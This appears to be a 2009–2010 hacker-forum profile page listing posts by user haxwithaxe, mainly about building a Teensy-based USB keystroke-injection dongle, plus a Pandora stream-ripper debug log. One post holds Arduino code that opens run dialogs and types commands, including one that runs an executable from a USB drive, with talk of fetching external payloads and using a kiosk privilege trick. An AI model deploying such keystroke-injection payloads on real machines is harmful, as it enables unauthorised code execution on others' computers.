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About haxwithaxe

  • Birthday 01/01/1986

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    Mo. Co., MD
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  1. i think the idea was that you wouldn't look like you're doing something you shouldn't in some place like a university computer lab <_< it's not terribly practical for anything else but it's an interesting challenge. also by coincidence, today a friend* of mine was poking around his university's network and happened upon a public kiosk that allowed him as a non-admin user to use the at command trick. not to say it's supposed to work that way but there's not likely to be any harm in trying. * as i am no longer in school this really isn't me :P edit: damn non ascii emiticons :/
  2. Despite it's limited use cases i think the minimize thing is a good idea to have implemented. I will be adding that to my code along with some other things like show desktop and I will also add support for macs and default linux configs. I can see using this to let things run for a few seconds after the ducky is removed without a big black box being on the screen. Think downloading and executing and external payload.
  3. The teensy can be used as both a HID and an MSD at the same time it's just a matter of making it share the sdcard as the storage and not itself. That would be the hard part. You are more likely to have success sooner with a teensy than with the ipod or rockbox just because there is no interest in those communities for this sort of thing. You might even have issues sending arbitrary keystrokes without doing some recoding of their libs too so the teensy route is the way to go. Plus if you get bored with the ducky you can make all sorts of things with the teensy.
  4. I would make packages for all the tools for ubuntu if I were to make a similar project. Instead of going the other way and building the drivers for backtrack. That said backtrack has a lot of modifications to the kernel config so it might end up being just too much crap to do to get some tools working. Also there is a project called nubuntu doing the exact thing I just suggested and they are having a hard time keeping up with the ubuntu release cycle. They have a full repo of all sorts of tools and they are trying really hard to keep up, so why not help them out and 1 get instant dev team and 2 help them out by contributing your effort instead of everyone heading in a million directions.
  5. It could well be. I only have a copy of deadmoo to work from but I have a mac owner working with me now so I'll see tonight I hope. Just checked with the mac users on #hak5 and they confirmed my path was wrong
  6. DUCKY CODE RELEASE TODAY!!!!!! YIPPY!!!!!! ^u^ >:( no code yet sorry EDIT: I would encourage people to transition to the usbducky section of the forum with any further suggestions and questions. If what Darren is putting out is better than this I will not be updating this thread with the code. This is the first thread here on the phukd? really? If you are looking for the USBDucky then hold on it's on it's way but this ain't it. Darren has been working for about a year on the USBDucky and it will certainly be good. So get your teensy and some other parts I'm not comfortable talking about ('cause I'm not sure Darren will use them) and play with my and Irongeek's code but keep an eye out for the USBDucky on Hak5 IT WILL BE GOOD. The conversation on #hak5 included the words "plug and play" and "turnkey" in reference to the USBDucky, so if this ain't good it'll at least be easy to get up and running, but after a year of work I can't imagine it won't be anything but amazing. So for those of you who don't know the PHUKD is this doohhicky --> http://www.irongeek.com/i.php?page=securit...eystroke-dongle Some parts you might consider getting regardless of what Darren does: - LEDs for feedback - microSD slot (the breakout boards are just as tiny so unless you are a huge soldering noob go for the slot by itself) - USB adapter for the miniB port (miniB to regularA double-male) - a 2 position switch to arm it and disarm it I suggest the microSD slot because I will be adding support for using the teensy as a mass storage device or running code on the teensy from the sdcard if Darren hasn't when he releases the Ducky. Here is one thing left out of the article: * in the arduino gui goto: sketch > add file and add all the files in arduino-xxxx/hardware/teensy/cores/tensy_hid/ I have not tested if all the files are needed but I have bigger fish to fry at the moment. Goto: Tools > Board > <your teensy model> (USB Keyboard/Mouse) Here are some changes i made to the original example. As is this will just blink (you won't see it since it happens so fast) you need to put a call to payload function in the place the comments say too or you can uncomment one of mine. EDIT: Added some more functions and update some info. EDIT (3/31/2010 12:22): Oh holy shit apple sucks big hairy donkey balls no run dialog and funny keys >:( Working on the AppleCommandRun funtion what is below is the best i can do right now i have no mac (just a VM) so i was lucky enough to get HaDak from #hak5 to find the keycode for the apple key. I need to do some getting payed fooling around though so I can't test it today. EDIT (4/1/2010): fix path for Apple payload's text edit demo EDIT (4/2/2010): Omi has fixed the AppleCommandRun and i am going to buy a copy of snowlepord to test with as soon as i get paid. /* The following is Irongeek's code (with many additions and subtractions by haxwithaxe and Omidenchin(aka Omi)) to do simple keyboard/mouse functions with the Teensy, including something like U3 functionality that will work even if autorun is disabled. NOTE: haxwithaxe has removed the DIPSwitch code because he doesn't have a dipswitch to play with, but it can be just as easily put back in and used to select the payload. It is strongly recommended that you go to Irongeek's site and not only look at his code but watch the acompanying video right above the code example Original Source: http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle Also see his updated source with some of my stuff in it. To learn more about Teensyduino see: http://www.pjrc.com/teensy/teensyduino.html Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID To learn more about keboard shortcuts Apple: http://support.apple.com/kb/ht1343 Windows: http://support.microsoft.com/kb/126449 Gnome/KDE: http://www.novell.com/coolsolutions/tip/2289.html please add more to this list if you can think of any window managers that have default keyboard shortcuts */ int ledPin = 6; // LED connected to digital pin 11 for teensy2 and pin 6 for teensy2++ // The setup() method runs once, when the sketch starts void setup() { // initialize the digital pin as an output: pinMode(ledPin, OUTPUT); } // the loop() method runs over and over again, // as long as the Arduino has power void loop() { delay(1000); // wait for host to listen digitalWrite(ledPin, HIGH); // set the LED on // os detection and payload go here //LinuxPayload(); //WindowsPayload(); //ApplePayload(); digitalWrite(ledPin, LOW); // set the LED off delay(15000); //keeps commands from being sent one after the other too fast } void LinuxPayload(){ GnomeKDECommandRun("xterm -e \"echo kill all humans! ... 01010001 &gt; pwnd &amp;&amp; cat pwnd -\""); // run drive finding cmd to be ripped from casper hopefully it'll be a "one liner" // i dont exist yet T_T // also waiting for Darren's USBDucky example code to see if he has gotten around doing this } void WindowsPayload(){ WindowsCommandRun("notepad.exe"); delay(1000); Keyboard.print("Irongeek was here!!! }:)"); WindowsCommandRun("cmd /c for /F %i in ('WMIC logicaldisk where \"DriveType=2\" list brief ^| find \"MYDISK\"') do %i\\myscript.exe"); } void ApplePayload(){ AppleCommandRun("/Applications/TextEdit.app/Contents/MacOS/TextEdit"); // open text editor delay(1000); Keyboard.print("hax was here!!! }:)"); // type message // or AppleCommandRun("echo kill all humans! ... 01010001"); // print a message directly in the terminal // run drive finding command // i don't own a mac so please feel free to make something up for me // also waiting for Darren's USBDucky example code to see if he has gotten around doing this } void WindowsCommandRun(char *SomeCommand){ KeyCombo(MODIFIERKEY_GUI,KEY_R); // open run dialog delay(1500); // wait for it to open Keyboard.print(SomeCommand); // enter some command KeyPress(KEY_ENTER); // exec some command } void GnomeKDECommandRun(char *SomeCommand){ KeyCombo(MODIFIERKEY_ALT,KEY_F2); // open run dialog delay(1500); // wait for it to open Keyboard.print(SomeCommand); // enter some command KeyPress(KEY_ENTER); // exec some command } // this is now works void AppleCommandRun(char *SomeCommand){ KeyCombo(MODIFIERKEY_GUI,KEY_SPACE); // "apple" aka command key, space key -- open spotlight delay(1500); // wanna make this as short as possible Keyboard.print("Terminal.app"); // type Terminal.app delay(1000); // wanna make this as short as possible KeyPress(KEY_ENTER); // press enter to run xterm delay(1500); // wanna make this as short as possible Keyboard.print(SomeCommand); // enter command KeyPress(KEY_ENTER); // run command } void KeyPress(int SomeKey) { Keyboard.set_key1(SomeKey); // set some key Keyboard.send_now(); // "press" some key // clear some key Keyboard.set_key1(0); Keyboard.send_now(); } void KeyCombo(int ModKey,int SomeKey) { Keyboard.set_modifier(ModKey); //set one or more modifier keys Keyboard.set_key1(SomeKey); // set regular key Keyboard.send_now(); // send strokes // clear keys Keyboard.set_modifier(0); // prep release of control keys Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times. Keyboard.send_now(); }
  7. Yup it's a shared drive. Right again : ) Windows Server 03 guest in VirtualBox 3 on an Ubuntu9.04 host. What would really be nice is if one could change the timing manually so that turbo mode takes extra long between downloads.(god that sounds like an odd request) Again thanks, and dang that was fast. EDIT: I just reinstalled guest additions and it's working great now. Apparently i hadn't updated guest additions from the last version. So @VBox users: DON'T FORGET TO UPDATE GUEST ADDITIONS!! : )
  8. Hey ZZJ, I have 2 errors for you to ponder. 1) when running the player I get the following error in the player window and playback stops it happens at an irregularly increasing frequency between 30min to start, 1song when I get fed-up C Error: IOException log: 12/10/2009 12:55:16 AM Saver2: Processing completed. 12/10/2009 12:55:16 AM Pandora: Adding Strung Out - Velvet Alley (Live)-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 12:58:09 AM StreamPlayer: Done sending data 12/10/2009 12:58:21 AM PandoraC: Song finished 12/10/2009 12:58:21 AM PandoraC: Start playing song: Rise Against - "Weight Of Time" on 'The Unraveling' (ID S539880) 12/10/2009 12:58:22 AM StreamPlayer: Play URL http://audio-sjl-t3-2.pandora.com/access/?version=4&amp;lid=156635920&amp;token=6CgPIwuPXktg%2FRGAxU7neQKvq%2FxDpOyTRLXaUq3jtJQpI0Z%2BZ9JsyYwuJATJw%2Bv6apLzLoGCrvFaEJM6MZWTiWWfFPEEQeJPo%2FzsWxryownldyh7lVrrLXNDV1eK60NmKRA9VSSXO5nC6BvxwNHMhAKU%2FOlXT%2B3Ji%2FGalKLIxhuU%2FUlXfnDqS25E1M97lqu3fuDODRykzitvVCUXPtEfbLCbw%2Biv4WVVHVHplSZwlhFBVI3E%2FYmRAHPIfNYzJxiF0J5l5mf3KnS%2FPfRdNs1EkYYW4cHQ7lhOJ%2BXsxaQBj6chvXgEFfLqrtK%2BCrab5oYqJFzMO6T23Oo%3D 12/10/2009 12:58:22 AM #258 GET http://audio-sjl-t3-2.pandora.com/access/?version=4&amp;lid=156635920&amp;token=6CgPIwuPXktg%2FRGAxU7neQKvq%2FxDpOyTRLXaUq3jtJQpI0Z%2BZ9JsyYwuJATJw%2Bv6apLzLoGCrvFaEJM6MZWTiWWfFPEEQeJPo%2FzsWxryownldyh7lVrrLXNDV1eK60NmKRA9VSSXO5nC6BvxwNHMhAKU%2FOlXT%2B3Ji%2FGalKLIxhuU%2FUlXfnDqS25E1M97lqu3fuDODRykzitvVCUXPtEfbLCbw%2Biv4WVVHVHplSZwlhFBVI3E%2FYmRAHPIfNYzJxiF0J5l5mf3KnS%2FPfRdNs1EkYYW4cHQ7lhOJ%2BXsxaQBj6chvXgEFfLqrtK%2BCrab5oYqJFzMO6T23Oo%3D 12/10/2009 12:58:22 AM S539880: Started downloading 12/10/2009 12:58:22 AM StreamPlayer: Data pipe ready 12/10/2009 12:58:22 AM StreamPlayer: Beginning song download 12/10/2009 12:58:23 AM StreamPlayer: Pipe connected 12/10/2009 12:58:23 AM StreamPlayer: Starting data transfer 12/10/2009 12:58:23 AM PandoraC: CrException: System.IO.IOException: There are no more files. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.Directory.InternalGetFileDirectoryNames(String path, String userPathOriginal, String searchPattern, Boolean includeFiles, Boolean includeDirs, SearchOption searchOption) at System.IO.Directory.GetFiles(String path, String searchPattern, SearchOption searchOption) at System.IO.Directory.GetFiles(String path, String searchPattern) at Saver2.SongInfo.Prepare(Int64 length) in E:\Codin' Projects\Saver Project\Saver2\SongInfo.cs:line 199 at Saver2.Saver.SongSniffed(SongInfo s) in E:\Codin' Projects\Saver Project\Saver2\Saver.Processing.cs:line 408 at Pandora.PandoraClientForm.Worker() in E:\Codin' Projects\Saver Project\Pandora\Client.Logic.cs:line 273 12/10/2009 12:58:23 AM StreamPlayer: Killing read thread 12/10/2009 12:58:23 AM StreamPlayer: Killing push thread 12/10/2009 12:58:24 AM StreamPlayer: Killing mplayer process 12/10/2009 12:58:26 AM S539880: Finished downloading 12/10/2009 12:58:26 AM S539880: Waiting for AART... 12/10/2009 12:58:32 AM PandoraC: Logging in to pandora... 12/10/2009 12:58:32 AM PandoraC: Syncing 12/10/2009 12:58:32 AM #259 POST http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;method=sync 12/10/2009 12:58:32 AM #259 POST 208 bytes to www.pandora.com 12/10/2009 12:58:32 AM PandoraC: Authenticating... 12/10/2009 12:58:32 AM Pandora: Inspecting XMLRPC 'sync': http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;method=sync 12/10/2009 12:58:32 AM #260 CONNECT www.pandora.com:443 12/10/2009 12:58:33 AM PandoraC: Login successful 12/10/2009 12:58:33 AM #260: SSL transaction finished, sent 1.1KB, rec 5.1KB 12/10/2009 12:58:34 AM PandoraC: Fetching playlist... 12/10/2009 12:58:34 AM #261 POST http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=getFragment&amp;arg1=164980723472012048&amp;arg2=0&amp;arg3=&amp;arg4=&amp;arg5=mp3%2Dhifi&amp;arg6=0&amp;arg7=0 12/10/2009 12:58:34 AM #261 POST 1200 bytes to www.pandora.com 12/10/2009 12:58:35 AM Pandora: Inspecting XMLRPC 'getFragment': http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=getFragment&amp;arg1=164980723472012048&amp;arg2=0&amp;arg3=&amp;arg4=&amp;arg5=mp3%2Dhifi&amp;arg6=0&amp;arg7=0 12/10/2009 12:58:35 AM Pandora: Data format: mp3 12/10/2009 12:58:35 AM Pandora: Got song S358876, URL = http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRIgykzDzytULa3bH1Jcxus7wgLffjb2%2B06rXTSENzHwXsDAUZxjU31Ff8unntWzagxFOwN%2BwT1v9wSimjffSIyWiR%2FwNEcbAq8wr2Vlk93h2lw1HC4EV0khirz2P1xmGUo0rhGbVRMo5gCSSJisaB77Cewyi011xyYJbJcei i2ywUDovGQLdhpN91SVaJclYLGsEhSzzr6vXrtoyQGKiIjT0vYwM8OSPurp3ZfhHgOBzhNPbBcFDoZA%3D 12/10/2009 12:58:35 AM Pandora: Got song S243904, URL = http://audio-ash-t3-1.pandora.com/access/3237124219901505947?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRB%2BZ0ykrqImRPP7DRlhjobNrTcKHibSgNgr%2FN%2FalVrFGWnG2XOm8%2FtAP4T0iIwhwqlrLY5zosLuYB1A1vtAl8BgZEFhkUZTNYgzvEQdyWEwl6HpGUlowaWfHS3NszZ9xusi%2Bb2%2F1EgvBAY3bsE5Y%2BZnSNKJdpOP%2BrwMoW4RVsg%2BTJS%2Faht%2BIyQGtrscc6tBIpk3VSZsDjGERVTkY8KZNQRrSpTrApQRtEX2fujUrsH7PJs0fIZVRNEM%3D 12/10/2009 12:58:35 AM Pandora: Got song S269485, URL = http://audio-sjl-t3-2.pandora.com/access/?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRB%2BqR0r72ys4DG9sm6ANLIISEKXN%2B6gqU0bH5EHlB8k8vERlDcLtgkuYBXz8PUqslvSZDFxD2N0iNllKTgzRM6d2hG7b0LT6%2BusY0TdZJcXE0l4A0pnm8zxb7FbmchswESLYawLFINdZ%2Fwf55s%2FKT57WlRgUA7ns7eZPkALfzi3e%2FCrLV0WuVMZnUTFkJnBgLKUVcNsD5YX6es5Zhw7YfeneLc7EFAYToSq%2Bo1QaFav5tDz%2FNyxiD8U%3D 12/10/2009 12:58:35 AM Pandora: Got song S918150, URL = http://audio-ash-t3-1.pandora.com/access/6053409439279673761?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRAXlFtq4OqSMyqAGB%2FhoK8efqDk%2BZ%2BGwMSSnSUQb2a2%2Bx%2BU%2Fu%2Bn2RCA4AoNlNIlbOVJ02bhBWJaauzacpo%2BiYIam84DWgjlNgr1xtvVVR0uMIYbdvBotnUhAdkY4DH9PtitaKdlzF0ijhjNv7aXHGQwFfcjje38%2Bu452g4cnoqm5gneZe3vhI8JhBC6p3bOZH%2FDMk8VWHsfBUwrqrlNa%2BLzpGHTRoVGeJdPzIXWthZ%2F%2FVGgqrBXOSY8%3D 12/10/2009 12:58:35 AM PandoraC: Start playing song: Face To Face - "Disconnected" on 'Shoot The Moon: The Essential Collection' (ID S358876) 12/10/2009 12:58:36 AM StreamPlayer: Play URL http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRIgykzDzytULa3bH1Jcxus7wgLffjb2%2B06rXTSENzHwXsDAUZxjU31Ff8unntWzagxFOwN%2BwT1v9wSimjffSIyWiR%2FwNEcbAq8wr2Vlk93h2lw1HC4EV0khirz2P1xmGUo0rhGbVRMo5gCSSJisaB77Cewyi011xyYJbJcei i2ywUDovGQLdhpN91SVaJclYLGsEhSzzr6vXrtoyQGKiIjT0vYwM8OSPurp3ZfhHgOBzhNPbBcFDoZA%3D 12/10/2009 12:58:36 AM #262 GET http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRIgykzDzytULa3bH1Jcxus7wgLffjb2%2B06rXTSENzHwXsDAUZxjU31Ff8unntWzagxFOwN%2BwT1v9wSimjffSIyWiR%2FwNEcbAq8wr2Vlk93h2lw1HC4EV0khirz2P1xmGUo0rhGbVRMo5gCSSJisaB77Cewyi011xyYJbJcei i2ywUDovGQLdhpN91SVaJclYLGsEhSzzr6vXrtoyQGKiIjT0vYwM8OSPurp3ZfhHgOBzhNPbBcFDoZA%3D 12/10/2009 12:58:36 AM S358876: Started downloading 12/10/2009 12:58:36 AM StreamPlayer: Data pipe ready 12/10/2009 12:58:36 AM StreamPlayer: Beginning song download 12/10/2009 12:58:37 AM StreamPlayer: Pipe connected 12/10/2009 12:58:37 AM StreamPlayer: Starting data transfer 12/10/2009 12:58:37 AM Pandora: sniffed Face To Face - "Disconnected" on 'Shoot The Moon: The Essential Collection' (ID S358876) 12/10/2009 12:58:37 AM #263 GET http://images-sjl-t2-1.pandora.com/images/public/amz/5/2/1/4/014381294125_130W_130H.jpg 12/10/2009 12:58:38 AM S358876: Got album art 12/10/2009 12:58:38 AM Pandora: sniffed Face To Face - "Disconnected" on 'Shoot The Moon: The Essential Collection' (ID S358876) 12/10/2009 12:58:42 AM StreamPlayer: Song download complete 12/10/2009 12:58:42 AM S358876: Finished downloading 12/10/2009 12:58:42 AM S358876: Song AART ready, submitting 12/10/2009 12:58:42 AM Saver2: Processing song Face To Face - "Disconnected" on 'Shoot The Moon: The Essential Collection' (ID S358876) 12/10/2009 12:58:42 AM FILE SAVED, Source: Pandora; MP3 format, 3337821 bytes 12/10/2009 12:58:44 AM Saver2: Tagging aac/mp3 file. 12/10/2009 12:58:45 AM Saver2: Tagging completed 12/10/2009 12:58:45 AM Saver2: Processing completed. 12/10/2009 12:58:45 AM Pandora: Adding Face To Face - Disconnected-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:01:53 AM StreamPlayer: Done sending data 12/10/2009 1:02:05 AM PandoraC: Song finished 12/10/2009 1:02:06 AM PandoraC: Start playing song: Snuff - "Keep The Beat" on 'Six Of One, Half A Dozen Of The Other' (ID S243904) 12/10/2009 1:02:06 AM StreamPlayer: Play URL http://audio-ash-t3-1.pandora.com/access/3237124219901505947?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRB%2BZ0ykrqImRPP7DRlhjobNrTcKHibSgNgr%2FN%2FalVrFGWnG2XOm8%2FtAP4T0iIwhwqlrLY5zosLuYB1A1vtAl8BgZEFhkUZTNYgzvEQdyWEwl6HpGUlowaWfHS3NszZ9xusi%2Bb2%2F1EgvBAY3bsE5Y%2BZnSNKJdpOP%2BrwMoW4RVsg%2BTJS%2Faht%2BIyQGtrscc6tBIpk3VSZsDjGERVTkY8KZNQRrSpTrApQRtEX2fujUrsH7PJs0fIZVRNEM%3D 12/10/2009 1:02:06 AM #264 GET http://audio-ash-t3-1.pandora.com/access/3237124219901505947?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRB%2BZ0ykrqImRPP7DRlhjobNrTcKHibSgNgr%2FN%2FalVrFGWnG2XOm8%2FtAP4T0iIwhwqlrLY5zosLuYB1A1vtAl8BgZEFhkUZTNYgzvEQdyWEwl6HpGUlowaWfHS3NszZ9xusi%2Bb2%2F1EgvBAY3bsE5Y%2BZnSNKJdpOP%2BrwMoW4RVsg%2BTJS%2Faht%2BIyQGtrscc6tBIpk3VSZsDjGERVTkY8KZNQRrSpTrApQRtEX2fujUrsH7PJs0fIZVRNEM%3D 12/10/2009 1:02:07 AM S243904: Started downloading 12/10/2009 1:02:07 AM StreamPlayer: Data pipe ready 12/10/2009 1:02:07 AM StreamPlayer: Beginning song download 12/10/2009 1:02:07 AM StreamPlayer: Pipe connected 12/10/2009 1:02:08 AM StreamPlayer: Starting data transfer 12/10/2009 1:02:08 AM Pandora: sniffed Snuff - "Keep The Beat" on 'Six Of One, Half A Dozen Of The Other' (ID S243904) 12/10/2009 1:02:08 AM #265 GET http://images-ash-t2-1.pandora.com/images/public/amz/3/2/8/8/751097068823_130W_130H.jpg 12/10/2009 1:02:08 AM S243904: Got album art 12/10/2009 1:02:09 AM Pandora: sniffed Snuff - "Keep The Beat" on 'Six Of One, Half A Dozen Of The Other' (ID S243904) 12/10/2009 1:02:10 AM StreamPlayer: Song download complete 12/10/2009 1:02:10 AM S243904: Finished downloading 12/10/2009 1:02:10 AM S243904: Song AART ready, submitting 12/10/2009 1:02:10 AM Saver2: Processing song Snuff - "Keep The Beat" on 'Six Of One, Half A Dozen Of The Other' (ID S243904) 12/10/2009 1:02:11 AM FILE SAVED, Source: Pandora; MP3 format, 2138696 bytes 12/10/2009 1:02:12 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:02:13 AM Saver2: Tagging completed 12/10/2009 1:02:13 AM Saver2: Processing completed. 12/10/2009 1:02:13 AM Pandora: Adding Snuff - Keep The Beat-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:04:09 AM StreamPlayer: Done sending data 12/10/2009 1:04:21 AM PandoraC: Song finished 12/10/2009 1:04:21 AM PandoraC: Start playing song: Amber Pacific - "Video Killed The Radio Star" on 'Punk Goes 80's' (ID S269485) 12/10/2009 1:04:22 AM StreamPlayer: Play URL http://audio-sjl-t3-2.pandora.com/access/?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRB%2BqR0r72ys4DG9sm6ANLIISEKXN%2B6gqU0bH5EHlB8k8vERlDcLtgkuYBXz8PUqslvSZDFxD2N0iNllKTgzRM6d2hG7b0LT6%2BusY0TdZJcXE0l4A0pnm8zxb7FbmchswESLYawLFINdZ%2Fwf55s%2FKT57WlRgUA7ns7eZPkALfzi3e%2FCrLV0WuVMZnUTFkJnBgLKUVcNsD5YX6es5Zhw7YfeneLc7EFAYToSq%2Bo1QaFav5tDz%2FNyxiD8U%3D 12/10/2009 1:04:22 AM #266 GET http://audio-sjl-t3-2.pandora.com/access/?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRB%2BqR0r72ys4DG9sm6ANLIISEKXN%2B6gqU0bH5EHlB8k8vERlDcLtgkuYBXz8PUqslvSZDFxD2N0iNllKTgzRM6d2hG7b0LT6%2BusY0TdZJcXE0l4A0pnm8zxb7FbmchswESLYawLFINdZ%2Fwf55s%2FKT57WlRgUA7ns7eZPkALfzi3e%2FCrLV0WuVMZnUTFkJnBgLKUVcNsD5YX6es5Zhw7YfeneLc7EFAYToSq%2Bo1QaFav5tDz%2FNyxiD8U%3D 12/10/2009 1:04:22 AM S269485: Started downloading 12/10/2009 1:04:22 AM StreamPlayer: Data pipe ready 12/10/2009 1:04:22 AM StreamPlayer: Beginning song download 12/10/2009 1:04:23 AM StreamPlayer: Pipe connected 12/10/2009 1:04:23 AM StreamPlayer: Starting data transfer 12/10/2009 1:04:23 AM Pandora: sniffed Amber Pacific - "Video Killed The Radio Star" on 'Punk Goes 80's' (ID S269485) 12/10/2009 1:04:23 AM #267 GET http://images-sjl-t2-1.pandora.com/images/public/amz/9/2/5/7/714753007529_130W_130H.jpg 12/10/2009 1:04:27 AM StreamPlayer: Song download complete 12/10/2009 1:04:27 AM S269485: Finished downloading 12/10/2009 1:04:27 AM S269485: Waiting for AART... 12/10/2009 1:04:27 AM S269485: Got album art 12/10/2009 1:04:27 AM Pandora: sniffed Amber Pacific - "Video Killed The Radio Star" on 'Punk Goes 80's' (ID S269485) 12/10/2009 1:04:27 AM S269485: Submitting song 12/10/2009 1:04:27 AM Saver2: Processing song Amber Pacific - "Video Killed The Radio Star" on 'Punk Goes 80's' (ID S269485) 12/10/2009 1:04:27 AM Saver2: File already exists! (Z:\music\music\Amber Pacific\Punk Goes 80's\Amber Pacific - Video Killed The Radio Star-pandora.mp3) 12/10/2009 1:06:42 AM StreamPlayer: Done sending data 12/10/2009 1:06:54 AM PandoraC: Song finished 12/10/2009 1:06:54 AM PandoraC: Start playing song: The Cheats - "Surrender" on 'Life's Short...' (ID S918150) 12/10/2009 1:06:55 AM StreamPlayer: Play URL http://audio-ash-t3-1.pandora.com/access/6053409439279673761?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRAXlFtq4OqSMyqAGB%2FhoK8efqDk%2BZ%2BGwMSSnSUQb2a2%2Bx%2BU%2Fu%2Bn2RCA4AoNlNIlbOVJ02bhBWJaauzacpo%2BiYIam84DWgjlNgr1xtvVVR0uMIYbdvBotnUhAdkY4DH9PtitaKdlzF0ijhjNv7aXHGQwFfcjje38%2Bu452g4cnoqm5gneZe3vhI8JhBC6p3bOZH%2FDMk8VWHsfBUwrqrlNa%2BLzpGHTRoVGeJdPzIXWthZ%2F%2FVGgqrBXOSY8%3D 12/10/2009 1:06:55 AM #268 GET http://audio-ash-t3-1.pandora.com/access/6053409439279673761?version=4&amp;lid=156635920&amp;token=u8E2JFjECyZq7S7VzHrB9UBfUFX89U0RdHXS9AzJsXRltSXFsB1ECuAtneQvcPNFruZrMA Ngz0bZ1Id8GaTtRAXlFtq4OqSMyqAGB%2FhoK8efqDk%2BZ%2BGwMSSnSUQb2a2%2Bx%2BU%2Fu%2Bn2RCA4AoNlNIlbOVJ02bhBWJaauzacpo%2BiYIam84DWgjlNgr1xtvVVR0uMIYbdvBotnUhAdkY4DH9PtitaKdlzF0ijhjNv7aXHGQwFfcjje38%2Bu452g4cnoqm5gneZe3vhI8JhBC6p3bOZH%2FDMk8VWHsfBUwrqrlNa%2BLzpGHTRoVGeJdPzIXWthZ%2F%2FVGgqrBXOSY8%3D 12/10/2009 1:06:55 AM S918150: Started downloading 12/10/2009 1:06:55 AM StreamPlayer: Data pipe ready 12/10/2009 1:06:55 AM StreamPlayer: Beginning song download 12/10/2009 1:06:55 AM StreamPlayer: Pipe connected 12/10/2009 1:06:56 AM StreamPlayer: Starting data transfer 12/10/2009 1:06:56 AM Pandora: sniffed The Cheats - "Surrender" on 'Life's Short...' (ID S918150) 12/10/2009 1:06:56 AM #269 GET http://images-sjl-t2-2.pandora.com/images/public/amg/1/4/0/0/187692000041_130W_130H.jpg 12/10/2009 1:07:00 AM StreamPlayer: Song download complete 12/10/2009 1:07:00 AM S918150: Finished downloading 12/10/2009 1:07:00 AM S918150: Waiting for AART... 12/10/2009 1:09:55 AM StreamPlayer: Done sending data 12/10/2009 1:10:08 AM PandoraC: Song finished 12/10/2009 1:10:09 AM PandoraC: Fetching playlist... 12/10/2009 1:10:09 AM #270 POST http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=getFragment&amp;arg1=164980723472012048&amp;arg2=0&amp;arg3=&amp;arg4=&amp;arg5=mp3%2Dhifi&amp;arg6=0&amp;arg7=0 12/10/2009 1:10:18 AM #270 POST 1200 bytes to www.pandora.com 12/10/2009 1:10:19 AM Pandora: Inspecting XMLRPC 'getFragment': http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=getFragment&amp;arg1=164980723472012048&amp;arg2=0&amp;arg3=&amp;arg4=&amp;arg5=mp3%2Dhifi&amp;arg6=0&amp;arg7=0 12/10/2009 1:10:19 AM Pandora: Data format: mp3 12/10/2009 1:10:19 AM Pandora: Got song S189317, URL = 